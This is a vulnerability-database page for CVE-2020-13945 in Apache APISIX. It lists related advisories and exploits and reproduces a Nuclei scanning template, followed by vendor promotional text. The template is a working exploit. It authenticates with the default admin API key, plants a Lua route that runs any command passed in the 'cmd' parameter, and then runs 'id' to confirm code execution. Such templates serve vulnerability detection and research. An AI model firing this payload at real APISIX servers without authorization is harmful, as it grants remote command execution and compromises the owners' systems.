| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| Exploit for CVE-2020-13945 | 18 Jul 202419:05 | – | githubexploit | |
| Apache APISIX Remote Code Execution Exploit | 7 Mar 202200:00 | – | zdt | |
| Apache APISIX 1.2 <= 1.5 Information Disclosure | 20 Apr 202200:00 | – | nessus | |
| CVE-2020-13945 | 7 Dec 202022:30 | – | circl | |
| Apache Apisix 安全漏洞 | 7 Dec 202000:00 | – | cnnvd | |
| Apache APISIX Trust Management Issues Vulnerability | 9 Dec 202000:00 | – | cnvd | |
| CVE-2020-13945 | 7 Dec 202019:04 | – | cve | |
| CVE-2020-13945 | 7 Dec 202019:04 | – | cvelist | |
| APISIX Admin API default access token RCE | 7 Mar 202217:42 | – | metasploit | |
| CVE-2020-13945 | 7 Dec 202020:15 | – | nvd |
id: CVE-2020-13945
info:
name: Apache APISIX - Insufficiently Protected Credentials
author: pdteam
severity: medium
description: Apache APISIX 1.2, 1.3, 1.4, and 1.5 is susceptible to insufficiently protected credentials. An attacker can enable the Admin API and delete the Admin API access IP restriction rules. Eventually, the default token is allowed to access APISIX management data.
impact: |
The vulnerability could result in unauthorized access to sensitive information, leading to potential data breaches or unauthorized actions.
remediation: |
Upgrade to the latest version of Apache APISIX, which includes a fix for the vulnerability. Additionally, ensure that sensitive credentials are properly protected and stored securely.
reference:
- https://github.com/vulhub/vulhub/tree/master/apisix/CVE-2020-13945
- https://lists.apache.org/thread.html/r792feb29964067a4108f53e8579a1e9bd1c8b5b9bc95618c814faf2f%40%3Cdev.apisix.apache.org%3E
- http://packetstormsecurity.com/files/166228/Apache-APISIX-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-13945
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2020-13945
cwe-id: CWE-522
epss-score: 0.72976
epss-percentile: 0.99384
cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: apache
product: apisix
shodan-query: http.title:"apache apisix dashboard"
fofa-query: title="apache apisix dashboard"
google-query: intitle:"apache apisix dashboard"
tags: cve2020,cve,intrusive,vulhub,packetstorm,apache,apisix,vuln
http:
- raw:
- |
POST /apisix/admin/routes HTTP/1.1
Host: {{Hostname}}
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
{
"uri":"/{{randstr}}",
"script":"local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream":{
"type":"roundrobin",
"nodes":{
"interact.sh:80":1
}
}
}
- |
GET /{{randstr}}?cmd=id HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- '"action":"create"'
- '"script":'
- '"node":'
condition: and
- type: status
status:
- 201
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
# digest: 4a0a00473045022033a1958744ef3d877efca869ddd16a3cb738a81f3d7881fb5b64b8115e04c227022100ead8f1ee23b46fb40a2de5a736eadea103d739c5b9d1f10011a9cfd0ea876caa:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation